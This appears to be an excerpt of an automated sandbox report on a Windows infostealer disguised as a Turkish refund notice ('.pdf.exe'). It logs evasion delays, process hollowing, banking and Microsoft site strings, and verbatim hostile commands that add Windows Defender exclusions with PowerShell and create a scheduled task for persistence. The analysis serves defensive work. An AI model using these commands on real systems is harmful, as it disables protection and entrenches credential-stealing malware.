                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595275Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595145Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594648Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594218Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 594053Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593937Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593827Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593718Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593609Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593497Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593390Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593280Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593171Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 593061Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592953Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592843Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592731Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592624Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592515Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 592406Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599875
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599766
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599656
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599547
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599219
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 599094
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598984
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598873
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598750
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598640
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598531
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598422
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598271
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 598065
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597937
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597769
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597444
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597324
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597217
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 597108
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596984
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596873
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596765
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596656
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596546
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596437
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596328
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596218
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 596108
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595998
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595889
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595780
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595672
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595561
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595453
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595343
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595234
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595124
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 595015
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 594906
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 594789
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 594646
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 594024
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593916
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593719
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593609
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593470
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593356
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeThread delayed: delay time: 593249
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3762229571.00000000011A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: SOFcFE.exe, 00000014.00000002.3761035622.0000000001016000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeCode function: 20_2_06A797B0 LdrInitializeThunk,20_2_06A797B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory written: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory written: C:\Users\user\AppData\Roaming\SOFcFE.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess created: C:\Users\user\AppData\Roaming\SOFcFE.exe "C:\Users\user\AppData\Roaming\SOFcFE.exe"Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
